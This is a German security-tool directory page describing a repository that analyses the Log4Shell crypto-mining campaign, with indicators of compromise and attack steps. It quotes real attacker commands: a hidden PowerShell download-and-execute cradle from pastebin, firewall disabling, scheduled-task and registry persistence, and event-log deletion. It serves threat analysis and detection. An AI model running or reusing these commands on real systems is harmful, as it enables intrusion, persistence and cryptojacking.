Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Log4j-Vulnerability — Pädagogische Analyse der Log4Shell-Schwachstelle (CVE-2021-44228), die deren Ausnutzung in einer Kryptowährungs-Mining-Kampagne mit IoCs, MITRE-ATT&CK-Zuordnung und Erkennungsleitfaden detailliert beschreibt. | Kitploit
Tools/GitHubGitHub/demining/log4j-vulnerability
Management von Indicators of Compromise (IOC)SchwachstellenanalyseExploitationMalware-AnalyseBedrohungsanalyseLernen & Bildung
GitHubdemining/log4j-vulnerability

Log4j-Vulnerability

Pädagogische Analyse der Log4Shell-Schwachstelle (CVE-2021-44228), die deren Ausnutzung in einer Kryptowährungs-Mining-Kampagne mit IoCs, MITRE-ATT&CK-Zuordnung und Erkennungsleitfaden detailliert beschreibt.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigenWebseite
6254vor 3 JahrenNoch nicht geprüft

Log4j-Schwachstelle



Exploit im Kryptowährungs-Mining-Code, der eine gefährliche Log4j-Schwachstelle ausnutzte
  • Tutorial: https://youtu.be/PNDBjoT83zA
  • Tutorial: https://cryptodeeptech.ru/log4j-vulnerability


Hintergrund zu Log4j

Das Alibaba Cloud Security Team hat öffentlich eine kritische Schwachstelle (CVE-2021-44228) offengelegt, die nicht authentifizierte Remote-Codeausführung bei mehreren Versionen von Apache Log4j2 (Log4Shell) ermöglicht. Angreifer können verwundbare Server ausnutzen, indem sie sich über ein beliebiges Protokoll wie HTTPS verbinden und eine speziell konstruierte Zeichenfolge senden.

Log4j-Crypto-Mining-Kampagne

Darktrace erkannte Crypto-Mining in mehreren Kundenumgebungen, das infolge der Ausnutzung dieser Log4j-Schwachstelle auftrat. In jedem dieser Vorfälle erfolgte die Ausnutzung über ausgehende SSL-Verbindungen, die wie Anfragen nach base64-kodierten PowerShell-Skripten wirken, um Perimetersicherungen zu umgehen und Batch-Dateien (.bat) sowie mehrere ausführbare Dateien herunterzuladen, die Crypto-Mining-Malware installieren. Die Aktivität wies breitere Kampagnenindikatoren auf, darunter gemeinsame hartkodierte IPs, ausführbare Dateien und Skripte.

Der Angriffszyklus beginnt mit einem scheinbar opportunistischen Scannen von mit dem Internet verbundenen Geräten auf der Suche nach VMWare-Horizons-Servern, die gegenüber dem Log4j-Exploit verwundbar sind. Sobald ein verwundbarer Server gefunden ist, stellt der Angreifer HTTP- und SSL-Verbindungen zum Opfer her. Nach erfolgreicher Ausnutzung führt der Server einen Callback auf Port 1389 durch und ruft ein Skript namens mad_micky.bat ab. Dies erreicht Folgendes:

  • Deaktiviert die Windows-Firewall, indem alle Profile auf state=off gesetzt werden
    ‘netsh advfirewall set allprofiles state off’
  • Sucht nach vorhandenen Prozessen, die auf andere Miner-Installationen hinweisen, und verwendet ‘netstat -ano | findstr TCP’, um Prozesse zu identifizieren, die auf den Ports :3333, :4444, :5555, :7777, :9000 laufen, und stoppt diese Prozesse
  • Ein neuer Webclient wird initiiert, um wxm.exe still herunterzuladen.
  • Geplante Aufgaben werden verwendet, um Persistenz zu erzeugen. Der Befehl ‘schtasks /create /F /sc minute /mo 1 /tn –‘ plant eine Aufgabe und unterdrückt Warnungen. Die Aufgabe soll innerhalb einer Minute nach dem Befehl eingeplant werden und erhält den Namen ‘BrowserUpdate’, der auf die schädliche Domain ‘b.oracleservice[.]top’ und hartkodierte IPs verweist: 198.23.214[.]117:8080 -o 51.79.175[.]139:8080 -o 167.114.114[.]169:8080
  • Für die Persistenz werden Registrierungsschlüssel in RunOnce hinzugefügt: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Run2 /d

In mindestens zwei Fällen wurde das Skript mad_micky.bat über eine HTTP-Verbindung abgerufen, die den User-Agent Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MAARJS) aufwies. Dies war das erste und einzige Mal, dass dieser User-Agent in diesen Netzwerken gesehen wurde. Es scheint, dass dieser User-Agent von einigen ASUS-Geräten mit frischen Werksinstallationen legitim verwendet wird; da es sich jedoch um einen neuen User-Agent handelt, der nur während dieser Aktivität gesehen wurde, ist er verdächtig.

Nach erfolgreicher Ausnutzung führt der Server einen Callback auf Port 1389 durch, um Skriptdateien abzurufen. In diesem Beispiel ist /xms.ps1 ein base64-kodiertes PowerShell-Skript, das die Ausführungsrichtlinie auf dem Host umgeht, um ‘mad_micky.bat’ aufzurufen:

Exploit im Kryptowährungs-Mining-Code, der eine gefährliche Log4j-Schwachstelle ausnutzte

Abbildung 1: Weitere Einblicke in das PowerShell-Skript xms.ps1

Der Schnappschuss zeigt das Ereignisprotokoll eines betroffenen Servers und deutet auf eine erfolgreiche Log4j-RCE hin, die zum Download der Datei mad_micky.bat führte:

Exploit im Kryptowährungs-Mining-Code, der eine gefährliche Log4j-Schwachstelle ausnutzte

Abbildung 2: Protokolldaten, die die Datei mad_micky.bat hervorheben

Es wurden zusätzliche Verbindungen initiiert, um ausführbare Dateien und Skripte abzurufen. Die Skripte enthielten zwei IP-Adressen in Korea und der Ukraine. Es wurde eine Verbindung zur ukrainischen IP hergestellt, um die ausführbare Datei xm.exe herunterzuladen, die den Miner aktiviert. Der Miner, XMRig Miner (in diesem Fall), ist ein Open-Source-Mining-Tool für mehrere Plattformen, das an mehreren öffentlichen Orten zum Download verfügbar ist. Der nächste beobachtete EXE-Download war ‘wxm.exe’ (f0cf1d3d9ed23166ff6c1f3deece19b4).

Exploit im Kryptowährungs-Mining-Code, der eine gefährliche Log4j-Schwachstelle ausnutzte

Abbildung 3: Weitere Einblicke in die XMRig-Ausführungsdatei

Die Verbindung zur koreanischen IP beinhaltete eine Anfrage für ein weiteres Skript (/2.ps1) sowie eine ausführbare Datei (LogBack.exe). Dieses Skript löscht laufende Aufgaben im Zusammenhang mit der Protokollierung, einschließlich SCM Event Log Filter oder PowerShell Event Log Consumer. Das Skript fordert außerdem eine Datei von Pastebin an, bei der es sich möglicherweise um eine Cobalt-Strike-Beacon-Konfigurationsdatei handelt. Die Protokolllöschungen wurden über geplante Aufgaben und WMI durchgeführt, darunter: Eventlogger, SCM Event Log Filter, DSM Event Log Consumer, PowerShell Event Log Consumer, Windows Events Consumer, BVTConsumer.

  • Konfigurationsdatei (nicht mehr gehostet): IEX (New-Object System.Net.Webclient) DownloadString(‘hxxps://pastebin.com/raw/g93wWHkR’)

Die zweite von Pastebin angeforderte Datei, die von Pastebin jedoch nicht mehr gehostet wird, ist Teil eines schtasks-Befehls und wurde daher wahrscheinlich zur Etablierung von Persistenz verwendet:

  • schtasks /create /sc MINUTE /mo 5 /tn  “\Microsoft\windows\.NET Framework\.NET Framework NGEN v4.0.30319 32” /tr “c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c ‘IEX ((new-object net.webclient).downloadstring(”hxxps://pastebin.com/raw/bcFqDdXx”’))'”  /F /ru System

Die ausführbare Datei Logback.exe ist ein weiteres XMRig-Mining-Tool. Eine Datei config.json wurde ebenfalls von derselben koreanischen IP heruntergeladen. Danach wurden cmd.exe- und wmic-Befehle verwendet, um den Miner zu konfigurieren.

Tool herunterladen